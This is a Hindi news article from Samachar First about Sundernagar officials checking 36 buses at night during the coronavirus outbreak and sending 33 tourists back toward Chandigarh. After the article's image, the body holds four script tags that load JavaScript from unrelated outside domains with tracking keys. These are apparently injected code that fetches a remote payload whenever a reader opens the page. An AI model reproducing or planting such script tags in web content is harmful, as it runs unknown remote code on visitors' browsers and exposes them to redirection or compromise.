Categories: हिमाचल

मंडीः 36 बसों की चेंकिग कर 33 पर्यटक भेजे चंडीगढ़, सुंदरनगर प्रशासन की बड़ी कार्रवाई

<p>हिमाचल प्रदेश में वैश्विक महामारी कोरोना को लेकर प्रदेश सरकार के दावों की पोल खुल गई है। बीते देर शाम प्रदेश में कोरोना वायरस के दो मामलों की पुष्टि होने के बावजूद हिमाचल पथ परिवहन निगम व अन्य बसों द्वारा विदेशी और बाहरी राज्यों के लोगों को प्रदेश में लाया जा रहा है। ऐसा ही एक सनसनीखेज मामला जिला मंडी के सुंदरनगर में पेश आया है। जहां देर रात 1 से लेकर 7 बजे तक सुंदरनगर प्रशासन द्वारा एसडीएम राहुल चौहान के नेतृत्व में डाक्टरों और पुलिस टीम सहित करीब 36 पर्यटक और परिवहन निगम की बसों को जांचा गया। सुंदरनगर के बस स्टैंड पर नाका लगाकर हिमाचल आने वाली बसों की गहनता से जांच की।</p>

<p>इस दौरान हरियाणा रोडवेज की बस में सवार मनाली की ओर जा रहे 2 मुंबई निवासी, 20 नेपाली, 6 केरल और 5 इजराइली लोगों को चंडीगढ वापस भेजा गया। प्रशासन ने इन सभी को सुबह 5 बजे सुंदरनगर डिपो की बस में भेजा और हिमाचल के बॉर्डर स्वारघाट तक का इन सभी का किराया भी खुद प्रशासन ने वहन किया।</p>

<p>एसडीएम सुंदरनगर राहुल चौहान ने पुष्टि करते हुए कहा कि कोरोना को लेकर एहतिहात बरतने के लिए सुंदरनगर प्रशासन 24 घंटे तैयार है। उन्होंने कहा कि बीती देर रात से सुबह तक बाहरी राज्यों से आने वाली बसों की गहन जांच की गई। उन्होंने कहा कि विदेशी और बाहरी राज्यों से आए हुए पर्यटकों को वापिस भेज दिया गया है।</p>

<p><img src=”/media/gallery/images/image(6023).jpeg” style=”height:192px; width:640px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1584769260160″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

अंतरराष्ट्रीय कुल्लू दशहरा: 13 से 19 अक्तूबर तक भव्य आयोजन, 332 देवता होंगे शामिल

  Kullu Dussehra 2024: अंतरराष्ट्रीय कुल्लू दशहरा उत्सव का शुभारंभ  13 अक्तूबर को राज्यपाल शिव…

29 mins ago

हमीरपुर में नहीं जलेंगे दशहरे के पुतले, लोगों ने सरकार से की आयोजन की मांग

No effigy burning Hamirpur : हमीरपुर शहर में पिछले 3 वर्षों से दशहरे का आयोजन…

58 mins ago

Himachal: अखिल भारतीय विद्यार्थी परिषद का 45वां प्रदेश अधिवेशन 7 से 9 नवंबर को हमीरपुर में

Hamirpur: अखिल भारतीय विद्यार्थी परिषद का 45वां प्रदेश अधिवेशन 7 से 9 नवंबर 2024 को…

60 mins ago

रतन टाटा के बाद नोएल टाटा को मिली टाटा ट्रस्ट की कमान

  Ratan Tata successor Noel Tata:  नोएल टाटा, जो दिवंगत रतन टाटा के सौतेले भाई…

1 hour ago

Himachal: एग्रीकल्चर सर्टिफिकेट के लिए 20 हजार मांगे, पटवारी रिश्वत लेते हुए गिरफ्तार

  Patwari arrested for bribe : हिमाचल प्रदेश के कांग`ड़ा जिले में स्टेट विजिलेंस एंड…

1 hour ago

आरएस बाली ने ब्रजेश्वरी मंदिर में परिवार सहित की पूजा-अर्चना, पूर्णाहुति डाली

RS Bali at Bajreshwari Temple : 11 अक्टूबर 2024 को हिमाचल प्रदेश पर्यटन विकास निगम…

2 hours ago